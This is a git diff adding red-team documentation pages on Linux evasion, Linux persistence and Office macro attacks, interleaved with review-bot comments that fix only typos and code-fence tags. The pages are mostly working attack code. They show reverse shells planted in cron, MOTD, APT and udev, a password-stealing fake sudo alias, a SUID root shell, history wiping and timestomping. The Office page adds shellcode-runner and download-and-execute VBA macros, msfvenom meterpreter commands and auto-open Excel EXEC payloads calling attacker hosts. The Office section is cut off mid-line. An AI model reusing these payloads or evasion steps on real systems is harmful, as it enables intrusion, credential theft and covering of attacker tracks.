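Review bot: the element name is missing from `we can create with Javascript our \ tag` in `HTML Smuggling.md`; the anchor element was swallowed by markdown, so escape the angle brackets or wrap it in backticks, otherwise the sentence does not say what is being created. Same file: `making a user to navigate`, `automaticaly` and `To store ou payload` are typos; the fences are tagged `Javascript` rather than lowercase `javascript`, which is what highlighters recognise; and `var file ='TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA...` is an unterminated string literal with no closing quote or semicolon, so either close it or mark it clearly as an elided placeholder. Unlike the other new redteam pages in this commit, this one has no References section; the Summary only links two headings.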
@@ -0,0 +1,120 @@ +# Linux - Evasion + +## Summary + +- [File names](#file-names) +- [Command history](#command-history) +- [Hiding text](#hiding-text) +- [Timestomping](#timestomping) + + +## File Names + +An Unicode zero-width space can be inserted into filenames which makes the names visually indistinguishable: + +```bash +# A decoy file with no special characters +touch 'index.php' + +# An imposter file with visually identical name +touch $'index\u200D.php' +``` + + +## Command History + +Most shells save their command history so a user can recall them again later. The command history can be viewed with the `history` command or by manually inspecting the contents of the file pointed to by `$HISTFILE` (e.g. `~/.bash_history`). +This can be prevented in a number of ways. + +```bash +# Prevent writing to the history file at all +unset HISTFILE + +# Don't save this session's command history in memory +export HISTSIZE=0 +``` + +Individual commands that match a pattern in `HISTIGNORE` will be excluded from the command history, regardless of `HISTFILE` or `HISTSIZE` settings. +By default, `HISTIGNORE` will ignore all commands that begin with whitespace: + +```bash +# Note the leading space character: + my-sneaky-command +``` + +If commands are accidentally added to the command history, individual command entries can be removed with `history -d`: + +```bash +# Removes the most recently logged command. +# Note that we actually have to delete two history entries at once, +# otherwise the `history -d` command itself will be logged as well. +history -d -2 && history -d -1 +``` + +The entire command history can be purged as well, although this approach is much less subtle and very likely to be noticed: + +```bash +# Clears the in-memory history and writes the empty history to disk. +history -c && history -w +``` + + +## Hiding Text + +ANSI escape sequences can be abused to hide text under certain circumstances. +If the file's contents are printed to the terminal (e.g. 
`cat`, `head`, `tail`) then the text will be hidden. +If the file is viewed with an editor (e.g. `vim`, `nano`, `emacs`), then the escape sequences will be visible. + +```bash +echo "sneaky-payload-command" > script.sh +echo "# $(clear)" >> script.sh +echo "# Do not remove. Generated from /etc/issue.conf by configure." >> script.sh + +# When printed, the terminal will be cleared and only the last line will be visible: +cat script.sh +``` + + +## Timestomping + +Timestomping refers to the alteration of a file or directory's modification/access timestamps in order to conceal the fact that it was modified. +The simplest way to accomplish this is with the `touch` command: + +```bash +# Changes the access (-a) and modification (-m) times using YYYYMMDDhhmm format. +touch -a -m -t 202210312359 "example" + +# Changes time using a Unix epoch timestamp. +touch -a -m -d @1667275140 "example" + +# Copies timestamp from one file to another. +touch -a -m -r "other_file" "example" + +# Get the file's modification timestamp, modify the file, then restore the timestamp. +MODIFIED_TS=$(stat --format="%Y" "example") +echo "backdoor" >> "example" +touch -a -m -d @$MODIFIED_TS "example" +``` + +It should be noted that `touch` can only modify the access and modification timestamps. It can't be used to update a file's "change" or "birth" timestamps. The birth timestamp, if supported by the filesystem, tracks when the file was created. The change timestamp tracks whenever the file's metadata changes, including updates to the access and modification timestamps. + +If an attacker has root privileges, they can work around this limitation by modifying the system clock, creating or modifying a file, then reverting the system clock: + +```bash +ORIG_TIME=$(date) +date -s "2022-10-31 23:59:59" +touch -a -m "example" +date -s "${ORIG_TIME}" +``` + +Don't forget that creating a file also updates the parent directory's modification timestamp as well! 
+ + +## References + +- [ATT&CK - Impair Defenses: Impair Command History Logging](https://attack.mitre.org/techniques/T1562/003/) +- [ATT&CK - Indicator Removal: Timestomp](https://attack.mitre.org/techniques/T1070/006/) +- [ATT&CK - Indicator Removal on Host: Clear Command History](https://attack.mitre.org/techniques/T1070/003/) +- [ATT&CK - Masquerading: Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005/) +- [Wikipedia - ANSI escape codes](https://en.wikipedia.org/wiki/ANSI_escape_code) +- [InverseCos - Detecting Linux Anti-Forensics: Timestomping](https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html) diff --git a/docs/redteam/Linux - Persistence.md b/docs/redteam/Linux - Persistence.md new file mode 100644 index 0000000..43f395d --- /dev/null +++ b/docs/redteam/Linux - Persistence.md 
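Review bot: the prose and the code in the File Names section of `Linux - Evasion.md` disagree: the text says a zero-width space, but `touch $'index\u200D.php'` inserts U+200D (ZERO WIDTH JOINER); ZERO WIDTH SPACE is U+200B. Make the comment match the code, because anyone writing a file-name check from this page will look for the wrong code point. Also `An Unicode` should be `A Unicode`. In Command History, `history -d -2 && history -d -1` depends on negative offsets, which `history -d` only accepts from bash 5.0 onwards; that deserves a caveat next to the comment. In Timestomping, `Don't forget that creating a file also updates the parent directory's modification timestamp as well!` doubles up `also` and `as well`, and `ORIG_TIME=$(date)` followed by `date -s "${ORIG_TIME}"` sets the clock back to the second it was read rather than to the current time, so the paragraph claiming root can work around the limitation should mention that the clock ends up behind by the elapsed time, which is itself a detectable artifact.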
@@ -0,0 +1,237 @@ +# Linux - Persistence + +## Summary + +* [Basic reverse shell](#basic-reverse-shell) +* [Add a root user](#add-a-root-user) +* [Suid Binary](#suid-binary) +* [Crontab - Reverse shell](#crontab---reverse-shell) +* [Backdooring a user's bash_rc](#backdooring-a-users-bash_rc) +* [Backdooring a startup service](#backdooring-a-startup-service) +* [Backdooring a user startup file](#backdooring-a-user-startup-file) +* [Backdooring Message of the Day](#backdooring-message-of-the-day) +* [Backdooring a driver](#backdooring-a-driver) +* [Backdooring the APT](#backdooring-the-apt) +* [Backdooring the SSH](#backdooring-the-ssh) +* [Backdooring Git](#backdooring-git) +* [Additional Linux Persistence Options](#additional-persistence-options) +* [References](#references) + + +## Basic reverse shell + +```bash +ncat --udp -lvp 4242 +ncat --sctp -lvp 4242 +ncat --tcp -lvp 4242 +``` + +## Add a root user + +```powershell +sudo useradd -ou 0 -g 0 john +sudo passwd john +echo "linuxpassword" | passwd --stdin john +``` + +## Suid Binary + +```powershell +TMPDIR2="/var/tmp" +echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c +gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null +rm $TMPDIR2/croissant.c +chown root:root $TMPDIR2/croissant +chmod 4777 $TMPDIR2/croissant +``` + +## Crontab - Reverse shell + +```bash +(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null +``` + +## Backdooring a user's bash_rc + +(FR/EN Version) + +```bash +TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0" +cat << EOF > /tmp/$TMPNAME2 + alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S 
' +EOF +if [ -f ~/.bashrc ]; then + cat /tmp/$TMPNAME2 >> ~/.bashrc +fi +if [ -f ~/.zshrc ]; then + cat /tmp/$TMPNAME2 >> ~/.zshrc +fi +rm /tmp/$TMPNAME2 +``` + +or add the following line inside its .bashrc file. + +```powershell +$ chmod u+x ~/.hidden/fakesudo +$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc +``` + +and create the `fakesudo` script. + +```powershell +read -sp "[sudo] password for $USER: " sudopass +echo "" +sleep 2 +echo "Sorry, try again." +echo $sudopass >> /tmp/pass.txt + +/usr/bin/sudo $@ +``` + + +## Backdooring a startup service + +* Edit `/etc/network/if-up.d/upstart` file + ```bash + RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" + sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart + ``` + + +## Backdooring Message of the Day + +* Edit `/etc/update-motd.d/00-header` file + ```bash + echo 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/update-motd.d/00-header + ``` + + +## Backdooring a user startup file + +Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop` + +```powershell +In : ~/.config/autostart/*.desktop + +[Desktop Entry] +Type=Application +Name=Welcome +Exec=/var/lib/gnome-welcome-tour +AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide +OnlyShowIn=GNOME; +X-GNOME-Autostart-enabled=false +``` + +## Backdooring a driver + +```bash +echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null +``` + +## Backdooring the APT + +If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};` +Next time "apt-get update" is done, your CMD will be executed! + +```bash +echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor +``` + +## Backdooring the SSH + +Add an ssh key into the `~/.ssh` folder. + +1. `ssh-keygen` +2. 
write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys` +3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys + +## Backdooring Git + +Backdooring git can be a useful way to obtain persistence without the need for root access. +Special care must be taken to ensure that the backdoor commands create no output, otherwise the persistence is trivial to notice. + +### Git Configs + +There are multiple [git config variables](https://git-scm.com/docs/git-config) that execute arbitrary commands when certain actions are taken. +As an added bonus, git configs can be specified multiple ways leading to additional backdoor opportunities. +Configs can be set at the user level (`~/.gitconfig`), at the repository level (`path/to/repo/.git/config`), and sometimes via environment variables. + +`core.editor` is executed whenever git needs to provide the user with an editor (e.g. `git rebase -i`, `git commit --amend`). +The equivalent environment variable is `GIT_EDITOR`. + +```properties +[core] +editor = nohup BACKDOOR >/dev/null 2>&1 & ${VISUAL:-${EDITOR:-emacs}} +``` + +`core.pager` is executed whenever git needs to potentially large amounts of data (e.g. `git diff`, `git log`, `git show`). +The equivalent environment variable is `GIT_PAGER`. + +```properties +[core] +pager = nohup BACKDOOR >/dev/null 2>&1 & ${PAGER:-less} +``` + +`core.sshCommand` is executed whenever git needs to interact with a remote *ssh* repository (e.g. `git fetch`, `git pull`, `git push`). +The equivalent environment variable is `GIT_SSH` or `GIT_SSH_COMMAND`. + +```properties +[core] +sshCommand = nohup BACKDOOR >/dev/null 2>&1 & ssh +[ssh] +variant = ssh +``` + +Note that `ssh.variant` (`GIT_SSH_VARIANT`) is technically optional, but without it git will run `sshCommand` _twice_ in rapid succession. (The first run is to determine the SSH variant and the second to pass it the correct parameters.) 
+ +### Git Hooks + +[Git hooks](https://git-scm.com/docs/githooks) are programs you can place in a hooks directory to trigger actions at certain points during git's execution. +By default, hooks are stored in a repository's `.git/hooks` directory and are run when their name matches the current git action and the hook is marked as executable (i.e. `chmod +x`). +Potentially useful hook scripts to backdoor: + +- `pre-commit` is run just before `git commit` is executed. +- `pre-push` is run just before `git push` is executed. +- `post-checkout` is run just after `git checkout` is executed. +- `post-merge` is run after `git merge` or after `git pull` applies new changes. + +In addition to spawning a backdoor, some of the above hooks can be used to sneak malicious changes into a repo without the user noticing. + +Lastly, it is possible to globally backdoor _all_ of a user's git hooks by setting the `core.hooksPath` git config variable to a common directory in the user-level git config file (`~/.gitconfig`). Note that this approach will break any existing repository-specific git hooks. 
+ + +## Additional Persistence Options + +* [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004) +* [Compromise Client Software Binary](https://attack.mitre.org/techniques/T1554) +* [Create Account](https://attack.mitre.org/techniques/T1136/) +* [Create Account: Local Account](https://attack.mitre.org/techniques/T1136/001/) +* [Create or Modify System Process](https://attack.mitre.org/techniques/T1543/) +* [Create or Modify System Process: Systemd Service](https://attack.mitre.org/techniques/T1543/002/) +* [Event Triggered Execution: Trap](https://attack.mitre.org/techniques/T1546/005/) +* [Event Triggered Execution](https://attack.mitre.org/techniques/T1546/) +* [Event Triggered Execution: .bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004/) +* [External Remote Services](https://attack.mitre.org/techniques/T1133/) +* [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574/) +* [Hijack Execution Flow: LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006/) +* [Pre-OS Boot](https://attack.mitre.org/techniques/T1542/) +* [Pre-OS Boot: Bootkit](https://attack.mitre.org/techniques/T1542/003/) +* [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053/) +* [Scheduled Task/Job: At (Linux)](https://attack.mitre.org/techniques/T1053/001/) +* [Scheduled Task/Job: Cron](https://attack.mitre.org/techniques/T1053/003/) +* [Server Software Component](https://attack.mitre.org/techniques/T1505/) +* [Server Software Component: SQL Stored Procedures](https://attack.mitre.org/techniques/T1505/001/) +* [Server Software Component: Transport Agent](https://attack.mitre.org/techniques/T1505/002/) +* [Server Software Component: Web Shell](https://attack.mitre.org/techniques/T1505/003/) +* [Traffic Signaling](https://attack.mitre.org/techniques/T1205/) +* [Traffic Signaling: Port Knocking](https://attack.mitre.org/techniques/T1205/001/) +* [Valid Accounts: Default Accounts](https://attack.mitre.org/techniques/T1078/001/) +* [Valid 
Accounts: Domain Accounts 2](https://attack.mitre.org/techniques/T1078/002/) + +## References + +* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289) +* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/) +* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html) +* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/) +* [Pouki from JDI](#no_source_code) diff --git a/docs/redteam/Office - Attacks.md b/docs/redteam/Office - Attacks.md new file mode 100644 index 0000000..bd00eda --- /dev/null +++ b/docs/redteam/Office - Attacks.md 
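Review bot: several code fences in `Linux - Persistence.md` are tagged `powershell` for shell, C and `.desktop` content (Add a root user, Suid Binary, both fakesudo blocks, the autostart block); tag them `bash`, `c` or `ini` so highlighting is correct and readers are not misled about the platform. In the Add a root user block, `passwd --stdin` exists only on Red Hat derived systems, so the page should say so. In Git Configs, `core.pager is executed whenever git needs to potentially large amounts of data` is missing its verb (`display`). The Summary label `Additional Linux Persistence Options` does not match the heading `Additional Persistence Options`, the autostart block opens with a bare `In : ~/.config/autostart/*.desktop` line inside the fence that is prose rather than file content, and the last reference `[Pouki from JDI](#no_source_code)` is a dead in-page anchor; either link a source or make it plain text.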
@@ -0,0 +1,747 @@ +# Office - Attacks + +### Summary + +* [Office Products Features](#office-products-features) +* [Office Default Passwords](#office-default-passwords) +* [Office Macro execute WinAPI](#office-macro-execute-winapi) +* [Excel](#excel) + * [XLSM - Hot Manchego](#xlsm---hot-manchego) + * [XLS - Macrome](#xls---macrome) + * [XLM Excel 4.0 - SharpShooter](#xlm-excel-40---sharpshooter) + * [XLM Excel 4.0 - EXCELntDonut](#xlm-excel-40---excelntdonut) + * [XLM Excel 4.0 - EXEC](#xlm-excel-40---exec) + * [SLK - EXEC](#slk---exec) +* [Word](#word) + * [DOCM - Metasploit](#docm---metasploit) + * [DOCM - Download and Execute](#docm---download-and-execute) + * [DOCM - Macro Creator](#docm---macro-creator) + * [DOCM - C# converted to Office VBA macro](#docm---c-converted-to-office-vba-macro) + * [DOCM - VBA Wscript](#docm---vba-wscript) + * [DOCM - VBA Shell Execute Comment](#docm---vba-shell-execute-comment) + * [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchostexe-using-scheduled-task) + * [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions) + * [DOCM - winmgmts](#docm---winmgmts) + * [DOCM - Macro Pack - Macro and DDE](#docmxlm---macro-pack---macro-and-dde) + * [DOCM - BadAssMacros](#docm---badassmacros) + * [DOCM - CACTUSTORCH VBA Module](#docm---cactustorch-vba-module) + * [DOCM - MMG with Custom DL + Exec](#docm---mmg-with-custom-dl--exec) + * [VBA Obfuscation](#vba-obfuscation) + * [VBA Purging](#vba-purging) + * [OfficePurge](#officepurge) + * [EvilClippy](#evilclippy) + * [VBA AMSI](#vba-amsi) + * [VBA - Offensive Security Template](#vba---offensive-security-template) + * [DOCX - Template Injection](#docx---template-injection) + * [DOCX - DDE](#docx---dde) +* [References](#references) + +## Office Products Features + +![Overview of features supported by different Office products](https://www.securesystems.de/images/blog/offphish-phishing-revisited-in-2023/Office_documents_feature_overview.png) + + +## 
Office Default Passwords + +By default, Excel does not set a password when saving a new file. However, some older versions of Excel had a default password that was used if the user did not set a password themselves. The default password was "`VelvetSweatshop`", and it could be used to open any file that did not have a password set. + +> If the user has not supplied an encryption password and the document is encrypted, the default encryption choice using the techniques specified in section 2.3 MUST be the following password: "`\x2f\x30\x31\x48\x61\x6e\x6e\x65\x73\x20\x52\x75\x65\x73\x63\x68\x65\x72\x2f\x30\x31`". - [2.4.2.3 Binary Document Write Protection Method 3](https://learn.microsoft.com/en-us/openspecs/office_file_formats/ms-offcrypto/57fc02f0-c1de-4fc6-908f-d146104662f5) + +| Product | Password | Supported Formats | +|------------|------------------|-------------------| +| Excel | VelvetSweatshop | all Excel formats | +| PowerPoint | 01Hannes Ruescher/01 | .pps .ppt | + +## Office Macro execute WinAPI + +### Description + +To importe Win32 function we need to use the keyword `Private Declare` +`Private Declare Function Lib "" Alias "" ( As , etc.) 
As ` +If we work on 64bit, we need to add the keyword `PtrSafe` between the keywords `Declare` and `Function` +Importing the `GetUserNameA` from `advapi32.dll`: +```VBA +Private Declare PtrSafe Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByRef nSize As Long) As Long +``` +`GetUserNameA` prototype in C: +```C +BOOL GetUserNameA( + LPSTR lpBuffer, + LPDWORD pcbBuffer +); +``` +### Example with a simple Shellcode Runner +```VBA +Private Declare PtrSafe Function VirtualAlloc Lib "Kernel32.dll" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr +Private Declare PtrSafe Function RtlMoveMemory Lib "Kernel32.dll" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr +Private Declare PtrSafe Function CreateThread Lib "KERNEL32.dll" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr + +Sub WinAPI() + Dim buf As Variant + Dim addr As LongPtr + Dim counter As Long + Dim data As Long + + buf = Array(252, ...) + + addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) + + + For counter = LBound(buf) To UBound(buf) + data = buf(counter) + res = RtlMoveMemory(addr + counter, data, 1) + Next counter + res = CreateThread(0, 0, addr, 0, 0, 0) + + +End Sub +``` + + +## Excel + +### XLSM - Hot Manchego + +> When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine. 
+ +* https://github.com/FortyNorthSecurity/hot-manchego + +```ps1 +Generate CS Macro and save it to Windows as vba.txt +PS> New-Item blank.xlsm +PS> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs +PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt +``` + +### XLM - Macrome + +> XOR Obfuscation technique will NOT work with VBA macros since VBA is stored in a different stream that will not be encrypted when you password protect the document. This only works for Excel 4.0 macros. + +* https://github.com/michaelweber/Macrome/releases/download/0.3.0/Macrome-0.3.0-osx-x64.zip +* https://github.com/michaelweber/Macrome/releases/download/0.3.0/Macrome-0.3.0-linux-x64.zip +* https://github.com/michaelweber/Macrome/releases/download/0.3.0/Macrome-0.3.0-win-x64.zip + +```ps1 +# NOTE: The payload cannot contains NULL bytes. + +# Default calc +msfvenom -a x86 -b '\x00' --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f raw EXITFUNC=thread > popcalc.bin +msfvenom -a x64 -b '\x00' --platform windows -p windows/x64/exec cmd=calc.exe -e x64/xor -f raw EXITFUNC=thread > popcalc64.bin +# Custom shellcode +msfvenom -p generic/custom PAYLOADFILE=payload86.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o shellcode-86.bin -b '\x00' +msfvenom -p generic/custom PAYLOADFILE=payload64.bin -a x64 --platform windows -e x64/xor_dynamic -f raw -o shellcode-64.bin -b '\x00' +# MSF shellcode +msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.59 LPORT=443 -b '\x00' -a x64 --platform windows -e x64/xor_dynamic --platform windows -f raw -o msf64.bin +msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.59 LPORT=443 -b '\x00' -a x86 --encoder x86/shikata_ga_nai --platform windows -f raw -o msf86.bin + +dotnet Macrome.dll build --decoy-document decoy_document.xls --payload popcalc.bin --payload64-bit popcalc64.bin +dotnet Macrome.dll build --decoy-document decoy_document.xls --payload shellcode-86.bin 
--payload64-bit shellcode-64.bin + +# For VBA Macro +Macrome build --decoy-document decoy_document.xls --payload-type Macro --payload macro_example.txt --output-file-name xor_obfuscated_macro_doc.xls --password VelvetSweatshop +``` + +When using Macrome build mode, the --password flag may be used to encrypt the generated document using XOR Obfuscation. If the default password of **VelvetSweatshop** is used when building the document, all versions of Excel will automatically decrypt the document without any additional user input. This password can only be set in Excel 2003. + + +### XLM Excel 4.0 - SharpShooter + +* https://github.com/mdsecactivebreach/SharpShooter + +```powershell +# Options +-rawscfile Path to raw shellcode file for stageless payloads +--scfile Path to shellcode file as CSharp byte array +python SharpShooter.py --payload slk --rawscfile shellcode.bin --output test + +# Creation of a VBA Macro +# creates a VBA macro file that uses the the XMLDOM COM interface to retrieve and execute a hosted stylesheet. +SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl + +# Creation of an Excel 4.0 SLK Macro Enabled Document +~# /!\ The shellcode cannot contain null bytes +msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o shellcode-encoded.bin -b '\x00' +SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee + +msfvenom -p generic/custom PAYLOADFILE=payload86.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o /tmp/shellcode-86.bin -b '\x00' +SharpShooter.py --payload slk --output foo --rawscfile /tmp/shellcode-86.bin --smuggle --template mcafee +``` + + +### XLM Excel 4.0 - EXCELntDonut + +* XLM (Excel 4.0) macros pre-date VBA and can be delivered in .xls files. 
+* AMSI has no visibility into XLM macros (for now) +* Anti-virus struggles with XLM (for now) +* XLM macros can access the Win32 API (virtualalloc, createthread, ...) + +1. Open an Excel Workbook. +2. Right click on "Sheet 1" and click "Insert...". Select "MS Excel 4.0 Macro". +3. Open your EXCELntDonut output file in a text editor and copy everything. +4. Paste the EXCELntDonut output text in Column A of your XLM Macro sheet. +5. At this point, everything is in column A. To fix that, we'll use the "Text-to-Columns"/"Convert" tool under the "Data" tab. +6. Highlight column A and open the "Text-to-Columns" tool. Select "Delimited" and then "Semicolon" on the next screen. Select "Finished". +7. Right-click on cell A1* and select "Run". This will execute your payload to make sure it works. +8. To enable auto-execution, we need to rename cell A1* to "Auto_Open". You can do this by clicking into cell A1 and then clicking into the box that says "A1"* just above Column A. Change the text from "A1"* to "Auto_Open". Save the file and verify that auto-execution works. + +:warning: If you're using the obfuscate flag, after the Text-to-columns operation, your macros won't start in A1. Instead, they'll start at least 100 columns to the right. Scroll horizontally until you see the first cell of text. Let's say that cell is HJ1. If that's the case, then complete steps 6-7 substituting HJ1 for A1 + +```ps1 +git clone https://github.com/FortyNorthSecurity/EXCELntDonut + +-f path to file containing your C# source code (exe or dll) +-c ClassName where method that you want to call lives (dll) +-m Method containing your executable payload (dll) +-r References needed to compile your C# code (ex: -r 'System.Management') +-o output filename +--sandbox Perform basic sandbox checks. +--obfuscate Perform basic macro obfuscation. 
+ +# Fork +git clone https://github.com/d-sec-net/EXCELntDonut/blob/master/EXCELntDonut/drive.py +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -platform:x64 -out:GruntHttpX64.exe C:\Users\User\Desktop\covenSource.cs +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -platform:x86 -out:GruntHttpX86.exe C:\Users\User\Desktop\covenSource.cs +donut.exe -a1 -o GruntHttpx86.bin GruntHttpX86.exe +donut.exe -a2 -o GruntHttpx64.bin GruntHttpX64.exe +usage: drive.py [-h] --x64bin X64BIN --x86bin X86BIN [-o OUTPUTFILE] [--sandbox] [--obfuscate] +python3 drive.py --x64bin GruntHttpx64.bin --x86bin GruntHttpx86.bin +``` + +XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f1391a7a598b456855/_posts/2020-05-25-Weaponizing-28-Year-Old-XLM-Macros.md + + +### XLM Excel 4.0 - EXEC + +1. Right Click to the current sheet +2. Insert a **Macro IntL MS Excel 4.0** +3. Add the `EXEC` macro + ```powershell + =EXEC("poWerShell IEX(nEw-oBject nEt.webclient).DownloAdStRiNg('http://10.10.10.10:80/update.ps1')") + =halt() + ``` +4. Rename cell to **Auto_open** +5. 
Hide your macro worksheet by a right mouse click on the sheet name **Macro1** and selecting **Hide** + + +### SLK - EXEC + +```ps1 +ID;P +O;E +NN;NAuto_open;ER101C1;KOut Flank;F +C;X1;Y101;K0;EEXEC("c:\shell.cmd") +C;X1;Y102;K0;EHALT() +E +``` + +## Word + +### DOCM - Metasploit + +```ps1 +use exploit/multi/fileformat/office_word_macro +set payload windows/meterpreter/reverse_http +set LHOST 10.10.10.10 +set LPORT 80 +set DisablePayloadHandler True +set PrependMigrate True +set FILENAME Financial2021.docm +exploit -j +``` + +### DOCM - Download and Execute + +> Detected by Defender (AMSI) + +```ps1 +Sub Execute() +Dim payload +payload = "powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$v=new-object net.webclient;$v.proxy=[Net.WebRequest]::GetSystemWebProxy();$v.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $v.downloadstring('http://10.10.10.10:4242/exploit');" +Call Shell(payload, vbHide) +End Sub +Sub Document_Open() +Execute +End Sub +``` + +### DOCM - Macro Creator + +* https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator + +```ps1 +# Shellcode embedded in the body of the MS-Word document, no obfuscation, no sandbox evasion: +C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d body +# Shellcode delivered over WebDAV covert channel, with obfuscation, no sandbox evasion: +C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -o +# Scriptlet delivered over bibliography source covert channel, with obfuscation, with sandbox evasion: +C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e +``` + +### DOCM - C# converted to Office VBA macro + +> A message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! 
This is tricking the victim to thinking the excel document is corrupted. + +https://github.com/trustedsec/unicorn + +```ps1 +python unicorn.py payload.cs cs macro +``` + +### DOCM - VBA Wscript + +> https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office + +```ps1 +Sub parent_change() + Dim objOL + Set objOL = CreateObject("Outlook.Application") + Set shellObj = objOL.CreateObject("Wscript.Shell") + shellObj.Run("notepad.exe") +End Sub +Sub AutoOpen() + parent_change +End Sub +Sub Auto_Open() + parent_change +End Sub +``` + +```vb +CreateObject("WScript.Shell").Run "calc.exe" +CreateObject("WScript.Shell").Exec "notepad.exe" +``` + + +### DOCM - VBA Shell Execute Comment + +Set your command payload inside the **Comment** metadata of the document. + +```vb +Sub beautifulcomment() + Dim p As DocumentProperty + For Each p In ActiveDocument.BuiltInDocumentProperties + If p.Name = "Comments" Then + Shell (p.Value) + End If + Next +End Sub + +Sub AutoExec() + beautifulcomment +End Sub + +Sub AutoOpen() + beautifulcomment +End Sub +``` + + +### DOCM - VBA Spawning via svchost.exe using Scheduled Task + +```ps1 +Sub AutoOpen() + Set service = CreateObject("Schedule.Service") + Call service.Connect + Dim td: Set td = service.NewTask(0) + td.RegistrationInfo.Author = "Kaspersky Corporation" + td.settings.StartWhenAvailable = True + td.settings.Hidden = False + Dim triggers: Set triggers = td.triggers + Dim trigger: Set trigger = triggers.Create(1) + Dim startTime: ts = DateAdd("s", 30, Now) + startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2) + trigger.StartBoundary = startTime + trigger.ID = "TimeTriggerId" + Dim Action: Set Action = td.Actions.Create(0) + Action.Path = "C:\Windows\System32\powershell.exe" + Action.Arguments = "-nop -w hidden -c IEX ((new-object 
